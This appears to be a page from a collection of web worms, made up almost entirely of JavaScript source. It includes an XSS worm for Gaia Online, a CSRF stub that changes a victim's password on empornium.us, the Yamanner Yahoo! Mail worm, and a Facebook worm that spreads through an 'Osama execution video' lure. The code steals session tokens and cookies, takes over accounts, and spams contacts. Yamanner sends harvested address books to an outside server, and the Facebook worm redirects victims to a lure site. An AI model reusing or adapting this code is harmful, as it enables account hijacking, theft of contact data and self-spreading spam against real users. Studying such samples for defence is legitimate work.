height="1"></td></tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"><tr><td><img src="http://graphics4.gaiaonline.com/images/template/s.gif" width="1" height="15"></td></tr></table>';
//XSS vector
var spreadOne = "http://www.gaiaonline.com/community/search.php?val="

//Replace content with newContent
document.getElementById("content").innerHTML=newContent;


//Detect which method of XHR to use.
      var xmlhttp;
      try {
          // Mozilla / Safari / IE7
          xmlhttp = new XMLHttpRequest();
      } catch (e) {
           // IE
           var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',
                                     'MSXML2.XMLHTTP.4.0',
                                     'MSXML2.XMLHTTP.3.0',
                                     'MSXML2.XMLHTTP',
                                     'Microsoft.XMLHTTP' );
          var success = false;
          for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {
              try {
                   xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
                      success = true;
                } catch (e) {}
          }
          if (!success) {
              throw new Error('Unable to create XMLHttpRequest.');
          }
     }

// URI to POST data to.
var targetURI = "/profile/privmsg.php";
//Parameters to pass to targetURI
var params = "[email protected]&subject=Check this out&folder=inbox&post=true&message=You should go check [url=" + spreadOne + escape('%22%3E%3Csc%72%69%70t%20defer%20%73%72%63%3D%2F/viewfor%2E%73%69%74%65%2E%63%6F%6D%2F%61%73%74%61%72%74%2E%6A%73%3E%3C/sc%72%69%70t%3E%3C%73%74%79%6C%65%3E') + "]this[/url] out.";

//Start XHR
xmlhttp.open("POST", targetURI, true);

//Set proper headers.
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");

// Send the parameters to the target. In this case, the "Check this out" PM.
xmlhttp.send(params);

Gaiaonline

.mario.mario

empornium.us - AJAX Worm PoC

This stub of a worm can be put into empornium.us torrent descriptions. Could be extended with more malicious payload and spread over the user's infected torrent descriptions. The worm has never run in the wild - admins of the portal were informed.

$(document).ready(function(){ 
	$.ajax({
  		type: 	"POST",
  		url: 	"http://empornium.us/takeprofedit.php",
  		data: 	"acceptpms=no&pmnotif=no&avatar=http://img150.imageshack.us/img150/3060/stallowned5wk.jpg&info=&[email protected]&chpassword=123456&passagain=123456",
 	 	success: function(msg){
   			alert( "Loading Complete..." );
  		}
	});
 });

empornium, csrf, ajax

Sven Vetsch / DisenchantSven Vetsch / Disenchant

Yamanner

Yamanner was a worm that exploited a vulnerability in the Yahoo! Mail service to send a copy of itself to other Yahoo! Mail contacts and it also captured the addresses in the addressbook of all the infected users and uploaded them to a server. By doing so, it was building an email list with many thousands of names that could be sold to spammers.

var http_request = false; 

var Email = ''; 

var IDList = ''; 

var CRumb = ''; 



function makeRequest(url, Func, Method, Param) {

	if (window.XMLHttpRequest) 

	{ 

		http_request = new XMLHttpRequest();

	} else if (window.ActiveXObject) 

	{ 

		http_request = new ActiveXObject('Microsoft.XMLHTTP'); 

	}

	

	http_request. onfiltered= Func;

	http_request.open(Method, url, true);

	

	if( Method == 'GET') http_request.send(null);

	else http_request.send(Param);

}



window.open('http://www.lastdata.com'); 

ServerUrl = url0;USIndex = ServerUrl.indexOf('us.' ,0);

MailIndex = ServerUrl.indexOf('.mail' ,0);

CutLen = MailIndex - USIndex - 3;

var Server = ServerUrl.substr(USIndex + 3, CutLen); 



function GetIDs(HtmlContent) { 

	IDList = '';

	StartString = ' ';

	EndString = '';

	i = 0; 

	StartIndex = HtmlContent.indexOf(StartString, 0); 



	while(StartIndex >= 0) { 

		EndIndex = HtmlContent.indexOf(EndString, StartIndex); 

		CutLen = EndIndex - StartIndex - StartString.length; 

		YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); 

	

		if( YahooID.indexOf('@yahoo.com', 0) > 0 || YahooID.indexOf('@yahoogroups.com', 0) > 0 ) IDList = IDList + ',' + YahooID ; 

		StartString = ''; 

		StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); 

		StartString = ' '; 

		StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); 

		i++; 

	} 



	if(IDList.substr(0,1) == ',') IDList = IDList.substr(1, IDList.length); 

	if(IDList.indexOf(',', 0)>0 ) { 

		IDListArray = IDList.split(','); 

		Email = IDListArray[0]; 

		IDList = IDList.replace(Email + ',', ''); 

	} 

	CurEmail = spamform.NE.value; 

	IDList = IDList.replace(CurEmail + ',', ''); 

	IDList = IDList.replace(',' + CurEmail, '');

	IDList = IDList.replace(CurEmail, '');

	UserEmail = showLetter.FromAddress.value;

	IDList = IDList.replace(',' + UserEmail, '');

	IDList = IDList.replace(UserEmail + ',', '');

	IDList = IDList.replace(UserEmail, ''); 

	return IDList; 

}



function ListContacts() {

	if (http_request.readyState == 4) {

		if (http_request.status == 200) { 

			HtmlContent = http_request.responseText;

			IDList = GetIDs(HtmlContent); 

			makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', null); 

		} 

	}

}



function ExtractStr(HtmlContent) { 

	StartString = 'name=\u0022.crumb\u0022 value=\u0022'; 

	EndString = '\u0022'; 

	i = 0; 

	StartIndex = HtmlContent.indexOf(StartString, 0); 

	EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); 

	CutLen = EndIndex - StartIndex - StartString.length; 

	crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); 

	return crumb; 

}



function Getcrumb() { 

	if (http_request.readyState == 4) { 

		if (http_request.status == 200) { 

			HtmlContent = http_request.responseText; 

			CRumb = ExtractStr(HtmlContent); 

			MyBody = 'this is test'; 

			MySubj = 'New Graphic Site'; 

			Url = 'http://us.' + Server + '.mail.yahoo.com/ym/Compose'; 

			var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf('&Mid=' ,0);

			incIndex = ComposeAction.indexOf('&inc' ,0);

			CutLen = incIndex - MidIndex - 5;

			var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); 

			QIndex = ComposeAction.indexOf('?box=' ,0);

			AIndex = ComposeAction.indexOf('&Mid' ,0);

			CutLen = AIndex - QIndex - 5;

			var BoxName = ComposeAction.substr(QIndex + 5, CutLen); 

			Param = 'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel'; 

			Param = Param.replace('BOXNAME', BoxName); 

			Param = Param.replace('RUMBVAL', CRumb); 

			Param = Param.replace('BCCLIST', IDList); 

			Param = Param.replace('TOEMAIL', Email);

			Param = Param.replace('FROMEMAIL', '[email protected]'); 

			Param = Param.replace('EMAILBODY', MyBody); 

			Param = Param.replace('PlainMESSAGE', ''); 

			Param = Param.replace('EMAILSUBJ', MySubj);

			Param= Param.replace('EMAILSUBJ', MySubj);

			Param = Param.replace('EMAILSUBJ', MySubj); 

			Param = Param.replace('EMAILMID', MyMid);

			Param = Param.replace('EMAILMID', MyMid);

			makeRequest(Url , alertContents, 'POST', Param); 

		} 

	}

}



function alertContents() { 

	if (http_request.readyState == 4) { 

		window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=' + IDList) 

	}

}



makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=' + Math.random(), ListContacts, 'GET', null)

Yahoo!, mail

pdppdp

Osama FaceBook worm

No description for this entry.
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
	
	var nameEQ = name + "=";
	var ca = document.cookie.split(';');
	for(var i=0;i < ca.length;i++) {
		var c = ca[i];
		while (c.charAt(0)==' ') c = c.substring(1,c.length);
		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
	}
	return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;

// Chat message variables 

var linkies = [
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down"
]

var this_chat = "Watch Osama's EXECUTION Video! " + linkies[Math.floor(Math.random()*linkies.length)];
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

	if(http1.readyState == 4 && http1.status == 200) { // If state = success
		
		var response1 = http1.responseText;
		
		response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
		response1 = JSON.parse(response1); // Convert the response to JSON
		
		//alert(response4.toSource());
		
		var count = 0;
		
		for(uid in response1.payload.entries){
			
			if(count < 400){
				
				//alert("SENT TO "+response1.payload.entries[count].uid);

				// Loop to send messages
			
				// New XMLHttp object
				var httpwp = new XMLHttpRequest();
							
				var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
				
				var statusmessage="Disturbing Yet Awesome!";
				var title="Bin Laden EXECUTION Video! Yes it's REAL!";
				var link=linkies[Math.floor(Math.random()*linkies.length)];
				var description="Commandos attack Bin Laden's compund and take him out!";
				var picture="http://i.imgur.com/yTjtU.jpg";
				
				var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
				
				httpwp.open("POST", urlwp, true);
				
				//Send the proper header information along with the request
				
				httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpwp.setRequestHeader("Content-length", paramswp.length);
				httpwp.setRequestHeader("Connection", "keep-alive");
				
				httpwp.onreadystatechange = function() { //Call a function when the state changes.
					if(httpwp.readyState == 4 && httpwp.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}

				}

				httpwp.send(paramswp);
	
			}

			count++; // increment counter
		
		}
				
		http1.close; // Close the connection
		
		
		
	}
	
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
	if(http3.readyState == 4 && http3.status == 200) {
		
		var response3 = http3.responseText;
		
		response3 = response3.replace("for (;;);", "");
		response3 = JSON.parse(response3);
		
		var count = 0;
		
		for(property in response3.payload.buddy_list.nowAvailableList){
			
			if(count < 100){
				
				// Loop to send messages
			
				// New XMLHttp object
				var httpc = new XMLHttpRequest();
				
				// Generate random message ID
								
				var msgid = Math.floor(Math.random()*1000000);
				
				var time = Math.round(new Date().getTime() / 1000);
				
				var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
				var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
				httpc.open("POST", urlc, true);
				
				//Send the proper header information along with the request
				httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpc.setRequestHeader("Content-length", paramsc.length);
				httpc.setRequestHeader("Connection", "close");
				
				httpc.onreadystatechange = function() { //Call a function when the state changes.
					if(httpc.readyState == 4 && httpc.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}
				}
				httpc.send(paramsc);
	
			}
			
			//alert(property);
			count++; // increment counter
		
		}
		
		http3.close; // Close the connection
		
	}
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
	if(http4.readyState == 4 && http4.status == 200) {
			
		http4.close; // Close the connection
		
	}
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
	if(http5.readyState == 4 && http5.status == 200) {
			
		http5.close; // Close the connection
		
	}
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
setTimeout("window.location = 'http://osama.mytopanswers.info/video.htm';", 15000);
facebook, osama bin laden